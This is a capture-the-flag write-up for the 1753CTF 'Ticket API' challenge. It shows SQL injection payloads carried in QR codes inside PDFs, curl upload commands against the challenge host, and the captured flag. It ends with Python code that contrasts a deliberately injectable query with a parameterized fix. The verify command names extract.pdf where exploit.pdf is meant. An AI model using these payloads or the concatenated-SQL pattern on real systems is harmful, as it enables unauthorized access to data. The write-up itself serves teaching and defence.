1753CTF

Ticket API

The challenge was a C# web app for submitting PDFs with QR codes containing a ticket UID. The challenge was to take advantage of faulty logic to make the website recognize our ticket as the admin ticket. It was fun to exploit an injection vulnerability using QR codes inside PDF files!

Unfortunately, I didn't have enough time to describe the challenge in detail, but I shared this in the Discord as a proposed solution.

Solution

I created a PDF with a QR code in it that encodes

%' and hash='admin-needs-no-hash

I named this one exploit.pdf. I uploaded it to the challenge program locally and noted down its hash. In my case it was d735db42e7bbd7043d1ddf07a3a003163f397745.

Then I created another PDF with a QR code, this one encoding

da9af4de-54f8-4185-bce3-a5095ca83646'
, 'd735db42e7bbd7043d1ddf07a3a003163f397745'); -- 

The first string is any random UUID so it passes the GUID check; the second string is the hash of exploit.pdf. I named this one inject.pdf.

Then I ran:

$ curl -X POST -F "file=@./inject.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/upload
"Ticket added"

and I got the flag:

$ curl -X POST -F "file=@./extract.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/verify
{"id":1,"code":"1753c{dizz_are_not_forged_if_they_have_the_same_hasshhh}","hash":"admin-needs-no-hash"}
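
Added example, not the challenge's code: a small Python/sqlite3 model of why the two QR payloads above work when QR text is concatenated into SQL, next to a version that validates the whole string as a GUID and binds parameters. The table layout, the query shapes, the weak 36-character GUID check and all function names are assumptions inferred from the payloads; the write-up does not show the application source.

```python
import sqlite3
import uuid

# Payloads and hash as quoted in the write-up (second payload joined onto one line).
EXPLOIT_QR = "%' and hash='admin-needs-no-hash"
EXPLOIT_HASH = "d735db42e7bbd7043d1ddf07a3a003163f397745"
INJECT_QR = "da9af4de-54f8-4185-bce3-a5095ca83646', '" + EXPLOIT_HASH + "'); -- "
INJECT_HASH = "0" * 40  # constructed placeholder for inject.pdf's own hash

def new_db():
    # Assumed schema; 'ADMIN-SECRET' is a constructed stand-in for the admin ticket code.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, code TEXT, hash TEXT)")
    db.execute("INSERT INTO tickets (code, hash) VALUES ('ADMIN-SECRET', 'admin-needs-no-hash')")
    return db

def upload_vulnerable(db, qr, file_hash):
    uuid.UUID(qr[:36])  # assumed weak check: only the leading 36 characters are validated
    db.execute(f"INSERT INTO tickets (code, hash) VALUES ('{qr}', '{file_hash}')")

def verify_vulnerable(db, qr, file_hash):
    # Assumed flow: the file hash must be known, then the QR text is spliced into a LIKE.
    if not db.execute(f"SELECT 1 FROM tickets WHERE hash = '{file_hash}'").fetchone():
        return None
    return db.execute(f"SELECT id, code, hash FROM tickets WHERE code LIKE '{qr}'").fetchone()

def upload_safe(db, qr, file_hash):
    # The whole QR string must be a canonical GUID, and values are bound as parameters.
    if str(uuid.UUID(qr)) != qr.lower():
        raise ValueError("QR content is not a GUID")
    db.execute("INSERT INTO tickets (code, hash) VALUES (?, ?)", (qr, file_hash))

def verify_safe(db, qr, file_hash):
    # Code and hash must match the same row; no pattern matching, no string building.
    return db.execute("SELECT id, code, hash FROM tickets WHERE code = ? AND hash = ?",
                      (qr, file_hash)).fetchone()

if __name__ == "__main__":
    db = new_db()
    upload_vulnerable(db, INJECT_QR, INJECT_HASH)
    print("vulnerable verify:", verify_vulnerable(db, EXPLOIT_QR, EXPLOIT_HASH))
    db = new_db()
    try:
        upload_safe(db, INJECT_QR, INJECT_HASH)
    except ValueError as exc:
        print("safe upload rejected:", exc)
    print("safe verify:", verify_safe(db, EXPLOIT_QR, EXPLOIT_HASH))
```

In the vulnerable path the stored hash column ends up attacker-chosen, which is what lets a different file pass the hash lookup; in the safe path the same strings are rejected or treated as inert data.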